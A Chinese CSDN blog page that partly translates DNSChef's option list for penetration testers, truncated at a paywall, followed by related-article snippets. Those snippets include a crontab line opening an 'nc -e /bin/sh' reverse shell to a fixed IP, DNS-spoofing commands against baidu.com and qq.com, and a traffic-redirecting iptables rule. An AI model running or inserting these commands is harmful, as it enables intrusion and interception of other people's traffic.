最新kali之dnschef

最新推荐文章于 2025-05-28 17:38:37 发布
最新推荐文章于 2025-05-28 17:38:37 发布
阅读量1.1k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: kali top13中文手册 文章标签: linux 安全 经验分享 debian
本文链接:https://blog.youkuaiyun.com/qq_40399982/article/details/112881830

描述:

  DNSChef是针对渗透测试人员和恶意软件分析师的高度可配置的DNS代理。 它能够精细配置哪些DNS回复以修改或简单地代理真实响应。 为了利用该工具,您必须手动配置或破坏DNS服务器条目以指向DNSChef。 该工具需要root特权才能在特权端口上运行。

选项参数:

-h,--help
	显示帮助信息并退出

--fakedomain thesprawl.org.google.com
	以逗号分隔的域名列表,将解析为上述参数中指定的FAKE值。 所有其他域名将解析为其真实值。

--truedomains thesprawl.org.google.com
	以逗号分隔的域名列表,这些列表将解析为TRUE值。 所有其他域名将解析为上述参数中指定的伪造值。

假DNS记录:

--fakeip 192.0.2.1
	用于匹配DNS查询的IP地址。 如果您在不指定域名的情况下使用此参数,则所有“ A”查询都会被欺骗。 如果需要定义多个IP地址,请考虑使用–file参数。

--fakeipv6 2001:db8::1
	用于匹配DNS查询的IPv6地址。 如果您在不指定域名的情况下使用此参数,则将欺骗所有“ AAAA”查询。 如果需要定义多个IPv6地址,请考虑使用--file参数。

--fakemail mail.fake.com
	用于匹配DNS查询的MX名称。 如果您在不指定域名的情况下使用此参数,则会欺骗所有“ MX”查询。 如果需要定义多个MX记录,请考虑使用--file参数。

--fakealias www.fake.c
了解本专栏 订阅专栏 解锁全文
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-19 957
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
kali虚拟机创建可以接入互联网的WIFI-两种方法以及DNS劫持的方法
L1763466202938的博客
12-25 1433
关于如何在kali虚拟机上搭建热点以及DNS劫持
dnschef实现dns欺骗
04-13
DNS欺骗【下】----dnschef实现 https://blog.youkuaiyun.com/redwand/article/details/105495873
KALI】DNS解析工具——Dnschef参数(中英对照)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 1822
dnschef usage: dnschef [options]: _ _ __ | | version 0.4 | | / _| __| |_ __ ___ ___| |__ ___| |_ / _` | '_ \/ __|/ __| '_ \ / _ \ _| | (_| | | | \__ \ (__| | | | __/ | \
Kali Linux渗透测试大师课:从环境配置到APT级攻击链构建(含CVE复现)
最新发布
xzc123111的博客
05-28 593
nmap --script targets-asn --script-args targets-asn.asn=AS15169 # 扫描Google IP段。crontab -e # 添加:*/5 * * * * nc -e /bin/sh 192.168.1.100 4444。:详细分析Dirty Pipe(CVE-2022-0847)利用原理。# 2. 免杀技术(Veil-Evasion)# 1. 钓鱼邮件生成(SEToolkit)# 2. 域渗透(BloodHound)
使用kali里的dnschef进行DNS欺骗
qq_33163046的博客
06-06 5394
本文使用kali自带的DNSChef工具做DNS欺骗,工具成功生效了
DNSChef使用
xiaoxuetu_的博客
07-25 8529
DNSChef是一种在Python中开发的跨平台应用程序。 一、设置DNS代理 1.首先将计算机设置为使用DNS名称服务器工具。 Linux: vim /etc/resolv.conf nameserver 127.0.0.1(如果在本地运行) Windows: 控制面板\所有控制面板项\网络和共享中心 属性--TCP/IPv4 二、运行DNSChef 查询一个域的
DNS欺骗【下】----dnschef实现
redwand的博客
04-13 2830
经过对比,很明显ettercap使用dns_spoof插件的情况明显比dnschef好用,dnschef使用时多了一步在客户端的DNS服务器设置步骤,且其开放了53端口,更容易被目标发现。.
kali密码破解笔记
fhl5203的博客
11-01 3145
密码破解 思路 目标系统实施了强安全措施 ·安装了所有补丁 ·无任何已知漏洞 ·无应用层漏洞 ·攻击面最小化 社会工程学 获取目标系统用户身份 ·非授权用户不受信,认证用户可以访问守信资源 ·已有用户账号权限受限,需要提权 ·不会触发系统报警 身份认证方法 证明你是你声称你是的那个人 ·你知道什么(账号密码、pin、passphrase) ·你有什么(令牌、token、key、证书、密宝、手机) ...
Kali Linux渗透测试工具大全
- DNSChef:提供动态DNS响应的工具,用于中间人攻击。 - fiked:一个可以模拟SMTP服务器的工具。 - hamster-sidejack:HTTP会话劫持工具。 - HexInject:用于注入自定义数据到网络流量中。 - iaxflood和inviteflood...
dnschef-0.2.1
04-25
dnschef-0.2.1
dnschef-0.2.1.rar
09-30
dnschef-0.2.1.rar
WinDNSSpoof DNS漏洞利用工具
09-22
常见的windows DNS漏洞利用工具,小巧好用的一款工具。
DNSChef 为渗透测试人员和恶意软件分析师提供一个高度可配置的DNS代理
ResumeProject的博客
08-31 380
DNSChef旨在为渗透测试人员和恶意软件分析师提供一个高度可配置的DNS代理。
DNS代理—DNSChef
weixin_30853329的博客
04-23 227
DNSChef是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析。DNS代理(又名“假DNS”),可用于分析用户间传输的网络流量。例如,我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机,进而对流量进行分析。在最新的版本0.2中,引入了对IPv6的支持、大量新的DNS记录类型,自定义端口和其他常用的功能。下载地址:http://thesprawl.org/pro...
dnschef进行DNS欺骗
嘟的博客
10-26 2131
title: dnschef DNS欺骗 tags: 中间人攻击 categories: 渗透测试 dnschef --fakeip=192.168.200.2 --fakedomains=www.baidu.com,www.qq.com --interface 192.168.200.243 -q fackip欺骗到指定的ip,facedomains欺骗域名 window修改dns服务器 ...
渗透测试专用DNS代理 - DNSChef
weixin_30849591的博客
01-29 440
DNSChef是一个高度可配置的DNS代理,用于渗透测试和恶意软件分析。DNS代理(又名“假DNS”),可用于分析用户间传输的网络流量。例如,我们可以使用一个DNS代理伪造所有到“badguy.com”的请求至本地计算机,进而对流量进行分析。 在最新的版本0.2中,引入了对IPv6的支持、大量新的DNS记录类型,自定义端口和其他常用的功能。 使用方法: 以root权限执行以下命令 # ...
DNS欺骗攻击2(结合dnschef
robacco的博客
09-23 903
实验步骤 1、开启Linux的ip包转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 2、使用iptables建立一个规则,该规则的功能是把所有截获到的DNS请求报文转发到本机的UDP 53 号端口 iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --...
信安学习---day21-25
ekko_jay的博客
11-23 1484
网络安全
dnschef
03-23
### DNSChef 工具概述 DNSChef 是一款功能强大的 Python 脚本,用于实现自定义的 DNS 服务器。它能够拦截并伪造特定域名的 DNS 响应,适用于渗透测试和安全研究场景[^1]。 #### 安装方法 要安装 DNSChef,需先确认已安装 Python 和 pip。以下是具体操作: 1. **克隆项目仓库** 使用 Git 将 DNSChef 的源码从 GitHub 下载到本地环境。 ```bash git clone https://github.com/iphelix/dnschef.git ``` 2. **依赖项安装** 进入目录后运行以下命令来安装所需的库文件。 ```bash cd dnschef && pip install -r requirements.txt ``` #### 基础用法 启动 DNSChef 需要在终端输入如下指令: ```bash python dnschef.py --fakeip 192.168.1.100 --fakedomains example.com,testsite.org ``` 上述命令会针对 `example.com` 或 `testsite.org` 返回 IP 地址 `192.168.1.100` 给请求者[^2]。 如果希望监听所有未指定域,则可以省略 `--fakedomains` 参数而仅保留通用响应机制。 #### 更多功能配置 通过参数 `-d/--domainfile`, 用户还可以加载外部列表形式管理多个假名记录;另外支持日志记录至文件等功能扩展[^3]。 ```python import argparse parser = argparse.ArgumentParser(description="DNSChef is a highly configurable DNS Proxy server.") group = parser.add_mutually_exclusive_group(required=True) group.add_argument("--fakeip", help="IP address to be returned for all A queries.", default="") group.add_argument("--fakedomains", nargs="+", help="A list of domain(s) which will respond with FAKE-IP.", default=[]) args = parser.parse_args() ``` 以上脚本片段展示了如何解析命令行选项以设置虚假 IP 及其关联的目标主机集合。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vanony

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值